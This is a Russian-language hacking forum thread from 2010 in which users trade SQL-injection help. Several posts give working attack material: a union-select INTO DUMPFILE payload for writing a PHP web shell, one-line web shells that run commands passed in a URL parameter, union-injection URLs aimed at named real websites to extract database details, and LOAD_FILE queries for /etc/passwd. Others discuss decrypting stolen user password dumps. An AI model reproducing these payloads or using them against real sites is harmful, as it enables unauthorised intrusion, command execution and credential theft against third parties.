HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12241  
Старый 29.03.2010, 16:45
Mondeo11
Новичок
Регистрация: 24.02.2010
Сообщений: 1
С нами: 8531779

Репутация: 1
По умолчанию

---

Последний раз редактировалось Mondeo11; 31.03.2010 в 18:22..
 
Ответить с цитированием

  #12242  
Старый 29.03.2010, 16:58
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Mondeo11  
обычная инъекция,делаю выборку паролей юзеров и получаю записи вида


и т.п. я так понимаю это в каком-то бинарном виде или что? как получить в норм виде?

для начала, узнать алгоритм шифрования
 
Ответить с цитированием

  #12243  
Старый 29.03.2010, 17:50
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

ребят, хочу залить шелл посредством SQL, а именно:

union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a.
Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?
 
Ответить с цитированием

  #12244  
Старый 29.03.2010, 18:20
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию

<?
echo "<pre>";
system($_GET["id"]);
echo "</pre>";
?>

вот и весь шелл)))
 
Ответить с цитированием

  #12245  
Старый 29.03.2010, 18:41
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

<? system($_GET[cmd]); ?>
 
Ответить с цитированием

  #12246  
Старый 29.03.2010, 19:32
olishort
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
С нами: 8988613

Репутация: 33
По умолчанию

нашел sql уязвимость

выдает ошибку
PHP код:
SQL query SELECT FROM mobiticket.structure_page WHERE tag '595'' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'active'' at line 3 
после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND

до AND сработает union? /* не обрыв строки? спасибо!

Последний раз редактировалось olishort; 29.03.2010 в 19:39..
 
Ответить с цитированием

  #12247  
Старый 29.03.2010, 19:47
street16
Познающий
Регистрация: 18.09.2006
Сообщений: 43
С нами: 10339129

Репутация: 3
По умолчанию

http://themood.ru/index.php?pr=15'
Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!
 
Ответить с цитированием

  #12248  
Старый 29.03.2010, 19:51
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами: 9061820

Репутация: 134
По умолчанию

Цитата:
Сообщение от street16  
http://themood.ru/index.php?pr=15'
Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!
http://themood.ru/index.php?pr=1500+union+select+1,2,3,concat(versio n(),0x3a,user(),0x3a,database()),5,6
 
Ответить с цитированием

  #12249  
Старый 29.03.2010, 20:30
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию

Цитата:
Сообщение от Mondeo11  
обычная инъекция,делаю выборку паролей юзеров и получаю записи вида


и т.п. я так понимаю это вроде в бинарном виде или что? уже видел записи в таком виде в других базах
Это скорее всего результат действия AES_ENCRYPT() или аналогов. Без доступа к сорсу точно не узнать (хотя можно попробовать посмотреть на свой пасс в надежде, что криптуется каким-нибудь маленьким постоянным словом).

PS А ну и естественно выводить через ascii()

Последний раз редактировалось budden; 29.03.2010 в 20:36..
 
Ответить с цитированием

  #12250  
Старый 30.03.2010, 00:11
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user

если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?


например как быть тут
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+wh ere+user='stmary_stmary'--

тут ведь нет таблицы user

Последний раз редактировалось jecka3000; 30.03.2010 в 00:14..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...